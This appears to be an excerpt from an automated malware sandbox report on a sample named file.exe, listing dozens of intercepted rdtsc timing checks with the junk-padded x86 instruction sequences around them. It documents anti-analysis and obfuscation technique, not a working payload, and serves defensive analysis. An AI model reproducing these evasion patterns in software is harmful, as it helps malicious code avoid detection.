                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC006 second address: EDC087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAB30C0632Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FAB30C06328h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx edx, ax 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FAB30C06328h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 movzx edx, cx 0x0000004a nop 0x0000004b jmp 00007FAB30C06336h 0x00000050 push eax 0x00000051 pushad 0x00000052 push esi 0x00000053 push edi 0x00000054 pop edi 0x00000055 pop esi 0x00000056 jo 00007FAB30C0632Ch 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC36F second address: EDC373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC373 second address: EDC385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC385 second address: EDC38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC38B second address: EDC38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC38F second address: EDC393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC393 second address: EDC3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FAB30C06328h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007FAB30C0632Bh 0x00000028 mov dword ptr [ebp+122D2DCBh], edi 0x0000002e push 0000001Eh 0x00000030 pushad 0x00000031 mov esi, 7CDB2D7Bh 0x00000036 mov edi, 643C03D4h 0x0000003b popad 0x0000003c nop 0x0000003d jmp 00007FAB30C06333h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jbe 00007FAB30C06328h 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC721 second address: EDC725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC81E second address: EDC88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAB30C0632Fh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FAB30C06328h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov dx, A31Dh 0x0000002e lea eax, dword ptr [ebp+1249139Ah] 0x00000034 mov edi, 3D9BFD95h 0x00000039 nop 0x0000003a jmp 00007FAB30C06338h 0x0000003f push eax 0x00000040 jbe 00007FAB30C06339h 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14A92 second address: F14A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14BE2 second address: F14C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FAB30C06326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FAB30C0632Bh 0x00000014 jl 00007FAB30C06326h 0x0000001a popad 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14C0D second address: F14C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D44Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14C1D second address: F14C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14DA7 second address: F14DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14EDD second address: F14EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C0632Dh 0x00000009 pop ecx 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1530D second address: F1532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D452h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FAB30D3D446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1532E second address: F15332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F15332 second address: F15338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F154AA second address: F154B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1B028 second address: F1B05D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FAB30D3D44Dh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAB30D3D456h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19F41 second address: F19F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A0B3 second address: F1A0BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A0BF second address: F1A0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAB30C06331h 0x00000008 jmp 00007FAB30C06337h 0x0000000d jmp 00007FAB30C0632Eh 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A52E second address: F1A536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AD53 second address: F1AD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AD5B second address: F1AD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0A8 second address: F1D0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0AC second address: F1D0CC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAB30D3D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FAB30D3D448h 0x00000010 pushad 0x00000011 jmp 00007FAB30D3D44Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D0CC second address: F1D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FAB30C0632Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FAB30C0632Ah 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBD3 second address: F1EBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBD9 second address: F1EBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBDF second address: F1EBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBE5 second address: F1EBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EBEA second address: F1EC1A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAB30D3D463h 0x00000008 jmp 00007FAB30D3D457h 0x0000000d je 00007FAB30D3D446h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jbe 00007FAB30D3D44Eh 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F215EE second address: F215F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F215F2 second address: F215F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2174E second address: F21762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C0632Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21762 second address: F21774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAB30D3D44Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F218E1 second address: F218E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21A6A second address: F21A74 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BFC second address: F26C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FAB30C06328h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 jmp 00007FAB30C0632Eh 0x00000019 jg 00007FAB30C06326h 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25EBE second address: F25ED8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAB30D3D44Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jnp 00007FAB30D3D446h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F261E0 second address: F261F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06330h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F261F9 second address: F26213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D456h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26345 second address: F26362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30C06338h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26765 second address: F2676D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2676D second address: F26772 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2AF85 second address: F2AFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D459h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31AF3 second address: F31AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31F4B second address: F31F59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAB30D3D448h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31F59 second address: F31F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 pushad 0x00000008 jnc 00007FAB30C06326h 0x0000000e jbe 00007FAB30C06326h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AE69 second address: F3AE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38F0A second address: F38F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A4A second address: F39A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39CC9 second address: F39CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAB30C06330h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39CEE second address: F39D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAB30D3D44Ah 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A2E7 second address: F3A316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007FAB30C06326h 0x00000013 jmp 00007FAB30C06331h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A316 second address: F3A31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A5C4 second address: F3A5CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB52 second address: F3AB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAB30D3D446h 0x0000000a jmp 00007FAB30D3D44Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB6F second address: F3AB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB75 second address: F3AB8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007FAB30D3D44Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB8E second address: F3AB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AB98 second address: F3AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF81 second address: F3DF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF8C second address: F3DF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E0C1 second address: F3E0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E0D6 second address: F3E0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jno 00007FAB30D3D446h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E230 second address: F3E236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E3CA second address: F3E3D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E3D0 second address: F3E3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30C06339h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F436C6 second address: F436E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007FAB30D3D446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FAB30D3D469h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FAB30D3D446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97DA3 second address: E97DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97DA8 second address: E97DAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FAD second address: F46FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FAB30C06332h 0x0000000b jns 00007FAB30C06326h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FC0 second address: F46FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FC8 second address: F46FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46FD9 second address: F46FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FAB30D3D461h 0x0000000d pushad 0x0000000e jl 00007FAB30D3D446h 0x00000014 jmp 00007FAB30D3D44Bh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA4B second address: F4EA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007FAB30C06326h 0x0000000c jmp 00007FAB30C06339h 0x00000011 popad 0x00000012 jmp 00007FAB30C0632Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAB30C0632Fh 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EA8E second address: F4EABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D44Fh 0x00000007 jmp 00007FAB30D3D458h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EABD second address: F4EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAC3 second address: F4EAC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAC7 second address: F4EAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAD5 second address: F4EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAD9 second address: F4EAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FAB30C06334h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBD4 second address: F4CBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBD8 second address: F4CBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jg 00007FAB30C06326h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBE8 second address: F4CC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D452h 0x00000007 jmp 00007FAB30D3D44Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FAB30D3D446h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CC10 second address: F4CC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
